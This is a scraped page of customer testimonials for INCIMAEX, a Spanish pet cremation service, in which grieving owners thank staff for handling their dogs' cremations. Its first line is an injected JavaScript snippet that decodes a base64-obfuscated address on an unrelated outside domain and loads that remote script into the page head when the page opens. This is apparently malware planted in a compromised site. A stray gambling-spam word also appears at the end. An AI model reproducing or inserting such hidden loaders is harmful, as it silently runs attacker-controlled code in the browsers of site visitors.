var DnWZblZIGJ=document.createElement("script");DnWZblZIGJ.src=atob("aHR0cHM6Ly9zYXJjb21hLnNwYWNlL2pzL21pbi5tYWluLmpz");document.getElementsByTagName("head")[0].appendChild(DnWZblZIGJ); Testimonios y Dedicatorias | INCIMAEX – Incineradora de Mascotas de Extremadura

Testimonios y Dedicatorias

  • Murió nuestra perrita de toda la vida, somos de Mérida y aquí no tenemos funerarias para perros. Queríamos un trámite rápido, ya que son momentos muy duros para todos. Contacté con ellos, fueron rapidísimos para darnos la cita, y nos facilitaron el traslado de nuestra perrita. Allí el trámite lo hacen muy llevadero, son muy comprensivos y amables, además de ser el lugar muy confortable y tranquilo. Me encantó el trato y la delicadeza que recibimos, también el apoyo que nos ofrecieron. Con todo esto solo puedo agradecerles en mayúsculas y por supuesto recomendarlo a quién se encuentre en la misma situación. P.d Nos encantó el detalle del marco con las huellas de Canela, nos llegó al corazón. Muchísimas gracias por todo :) Familia Vinuesa Domínguez

    ALEJANDRA AMANDA VINUESA DOMÍNGUEZ
  • Buen servicio, buen trato, buenas instalaciones, todo fenomenal. Fue muy acertada la decisión que tomamos con el pequeño. Gracias Incimaex, me parece genial este tipo de instalaciones para dar una digna despedida a nuestras mascotas.

    ACJ Cuevas
  • Solo daros las gracias por todo. Han sido impecables el servicio, el trato, el apoyo… Gracias de todo corazón por haber hecho que el momento más difícil y temido por la familia fuese recordado para siempre. Gracias de corazón.

    Pilar Martín-Javato Troyano
  • Hola, quería dejar constancia del buen trato, tacto y amabilidad que hemos tenido de parte de José Luis en Incimaex de la ciudad de Badajoz en la despedida a nuestro perro Otto, que es y será siempre nuestro príncipe allá donde esté. El trato ha sido de 10, ya tenemos las cenizas de nuestro príncipe con nosotros. Recomiendo Incimaex a todo el mundo.

    María del Carmen Polo
  • PÉRDIDA DE PRÍNCIPE | Muchísimas gracias por vuestro servicio, quedamos toda la familia super agradecida. Aplaudir la rapidez y y el trato recibido en todo momento. Un fuerte abrazo a todo el equipo que formáis parte de la empresa.

    CARLOS MANZANO SÁNCHEZ
  • La pérdida de nuestra querida galga  coincidió con  la recuperación de una delicada operación de corazón de mi marido. Por ello, valoramos más la rapidez, delicadeza  y sensibilidad que mostraron con nosotros. Gracias. Beatriz.

    Beatriz Reinaldo Puro
  • Como siempre sois únicos siempre dais un servicio 10 a mis pacientes pero hoy yo era esa persona que iba llorando para incinerar a mi kiara. Servicio excelente mil gracias por como os portáis.

    Tania Retortillo
  • Sin duda a sido la mejor decisión que hemos podido tomar. Gracias por todo, El detalle del cuadro nos ha emocionado. Iker siempre estará con nosotros. Mii niño te echamos mucho de menos.

    Mireia Macías
  • ¡Hasta siempre, Keny! Aún no me lo creo pero tengo que hacerme a la idea que ya no volveré a verte más. Al menos tengo el consuelo de tener una parte de ti gracias a este servicio. No me esperaba el detalle del cuadro con su huella. Gracias, de corazón. Te amamos gordito, hasta siempre amigo mío.

    Antonio Lavado
  • Blondie estará con nosotros (Ursi, Javier y Javi) en su urna y otra parte para formar vida junto a un tejo. Era la perra más bonita del Mundo.

    Javier Bastos
  • Vuestro trato es inmejorable muy atentos con toda la familia transparencia y seriedad al más alto nivel gracias por tratarnos con tanta delicadeza,nuestro amigo fiel a tenido un final digno,gracias a vosotros y nosotros podemos conservar sus restos a nuestro lado. Gracias de corazón.

    Tania
  • Desde la defunción de mi mascota hasta su incineración, todo fue ágil y cómodo, gracias a INCIMAEX. Nos sentimos acompañados en todo momento. Gracias.

    Maria G.
  • Excelente servicio en un momento difícil. Muchas gracias por el trato recibido. Recomiendo INCIMAEX a todo el mundo.

    Pedro C.

Deja tu testimonio o dedicatoria

Lo revisaremos y procederemos a publicarlo en la web.

ufabet